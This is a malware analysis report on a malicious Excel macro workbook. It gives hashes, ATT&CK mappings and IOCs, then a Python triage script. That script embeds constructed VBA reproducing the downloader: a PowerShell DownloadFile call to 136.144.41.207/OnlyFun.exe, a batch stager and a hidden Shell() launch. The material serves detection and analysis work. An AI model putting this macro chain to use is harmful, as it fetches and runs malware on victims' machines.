Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 b2ce2ad6d522621b…

MALICIOUS

Office (OOXML) / .XLSM

Size: 32.4 KB
Created: 2022-01-01 15:05:54 UTC
Authoring application: Microsoft Excel Online 16.0300
MD5: 8aae2f4a9b68e6458f4838b1d5e38878
SHA-1: 1118bfbdbcd96a9470cc490046bdc1efb490dc75
SHA-256: b2ce2ad6d522621b917ce77b362541bcfa0976bdcbbc36f1a57ec1c5d6199112
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell

The critical heuristic (a Shell() call in VBA), taken together with the extracted macro source, indicates a downloader. The macro reconstructs a PowerShell command from obfuscated string fragments to fetch 'http://136.144.41.207/OnlyFun.exe' and write it to '%APPDATA%\ProcName', then runs 'powershell.exe -ExecutionPolicy Bypass -NoProfile -File $env:APPDATA\ProcName' against the dropped file. A temporary batch file, 'Mphdjnjiec.bat', is written to stage these commands and is launched through Shell(). The indicators to pivot on are the host 136.144.41.207, the drop path %APPDATA%\ProcName and the batch file name. Two caveats: this verdict is static, so the payload was not fetched and the second stage is uncharacterised; and powershell.exe's -File switch expects a .ps1 script, so whether the dropped executable actually launches as written is not established by this analysis.

Heuristics (2)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains xl/vbaProject.bin, so VBA macros are present

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas
    Kind:    vba-macro
    Source:  oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size:    2315 bytes
    SHA-256: aaf0070159ba499fe03acad55034a163af5f6d6f9764d6b44916d5865bb69d53
  • vbaProject_00.bin
    Kind:    vba-project
    Source:  OOXML VBA project: xl/vbaProject.bin
    Size:    6144 bytes
    SHA-256: a17a79cdb5d232c53bc0fc50a0cbc04850d521d48df2bb845e51993a86734007
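Added triage example, not part of this report's analysis pipeline (the report's artifacts came from oletools). It reproduces the two heuristics and the artifact carving above in a self-contained way: open the OOXML container as a zip, carve and hash xl/vbaProject.bin (OOXML_VBA), then scan decoded VBA source for a Shell() call (OLE_VBA_SHELL) after folding concatenated string literals so the URL, drop path and batch file name surface as IOCs. The workbook and the VBA text are constructed for the example; the IOCs inside the VBA are the ones quoted in the report, but the obfuscation is not the real sample's, and the vbaProject.bin here is a placeholder blob (the real part is an OLE compound file that olevba decompresses).

```python
"""
Added triage example (constructed; not the report's own tooling).
  OOXML_VBA     - carve xl/vbaProject.bin from the zip container and hash it
  OLE_VBA_SHELL - find Shell() in decoded VBA and extract IOCs
"""
import hashlib
import io
import re
import zipfile
from typing import Optional

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE compound file header

# Constructed stand-in for olevba's decoded output (the report's macros.bas).
# Only string-literal concatenation is used to split the IOCs.
SAMPLE_VBA = r'''
Sub Auto_Open()
    Dim u As String, p As String, cmd As String
    u = "http://136.144." & "41.207/Only" & "Fun.exe"
    p = "%APPDATA%\ProcName"
    cmd = "powershell -c (New-Object Net.WebClient)" & ".DownloadFile('" & u & "','" & p & "')"
    Open Environ("TEMP") & "\Mphdjnjiec.bat" For Output As #1
    Print #1, cmd
    Print #1, "powershell.exe -ExecutionPolicy Bypass -NoProfile -File $env:APPDATA\ProcName"
    Close #1
    Call Shell(Environ("TEMP") & "\Mphdjnjiec.bat", vbHide)
End Sub
'''


def build_sample_xlsm(with_vba: bool = True) -> bytes:
    """Constructed minimal OOXML container. With with_vba=True it carries a
    placeholder xl/vbaProject.bin (OLE header plus padding), which is all the
    OOXML_VBA check keys on; with_vba=False yields a macro-free workbook."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            z.writestr("xl/vbaProject.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


def carve_vba_project(doc: bytes) -> Optional[dict]:
    """OOXML_VBA: return name, size and SHA-256 of the VBA project part
    (what the report lists as vbaProject_00.bin), or None if absent."""
    with zipfile.ZipFile(io.BytesIO(doc)) as z:
        for name in z.namelist():
            if name.lower().endswith("vbaproject.bin"):
                data = z.read(name)
                return {
                    "name": name,
                    "size": len(data),
                    "sha256": hashlib.sha256(data).hexdigest(),
                    "is_ole": data.startswith(OLE_MAGIC),
                }
    return None


# closing quote, '&', optional VBA line continuation, opening quote
_CONCAT = re.compile(r'"\s*&\s*(?:_\s*)?"')


def join_literals(vba: str) -> str:
    """Fold "abc" & "def" into "abcdef" so split IOCs become searchable.
    Only literal-to-literal joins are folded; variables are left alone."""
    return _CONCAT.sub("", vba)


def scan_vba(vba: str) -> dict:
    """OLE_VBA_SHELL plus IOC extraction over decoded VBA source."""
    src = join_literals(vba)
    f = {
        "shell_call": re.search(r"\bShell\s*\(", src) is not None,
        "urls": sorted(set(re.findall(r"https?://[^\s\"'<>()]+", src))),
        "drop_paths": sorted(set(re.findall(r"(?:%APPDATA%|\$env:APPDATA)\\[\w.]+", src))),
        "batch_files": sorted(set(re.findall(r"[\w-]+\.bat\b", src, re.I))),
        "powershell_flags": sorted(set(re.findall(r"-(?:ExecutionPolicy \w+|NoProfile|File)\b", src))),
    }
    attack = []
    if f["shell_call"]:
        attack.append("T1059.005")  # Visual Basic: the macro calls Shell()
    if f["batch_files"]:
        attack.append("T1059.003")  # Windows Command Shell: .bat stager
    f["attack"] = attack
    return f


if __name__ == "__main__":
    print("vbaProject:", carve_vba_project(build_sample_xlsm()))
    for k, v in scan_vba(SAMPLE_VBA).items():
        print(f"{k}: {v}")
```

The literal-folding step is the part worth keeping in a real triage script: it is cheap, and it is what turns a string such as "http://136.144." & "41.207/Only" & "Fun.exe" into a URL a regex can catch. It deliberately does nothing for variables, Chr()/StrReverse() tricks or runtime decoding; for those, olevba's own deobfuscation or a sandbox run is still needed.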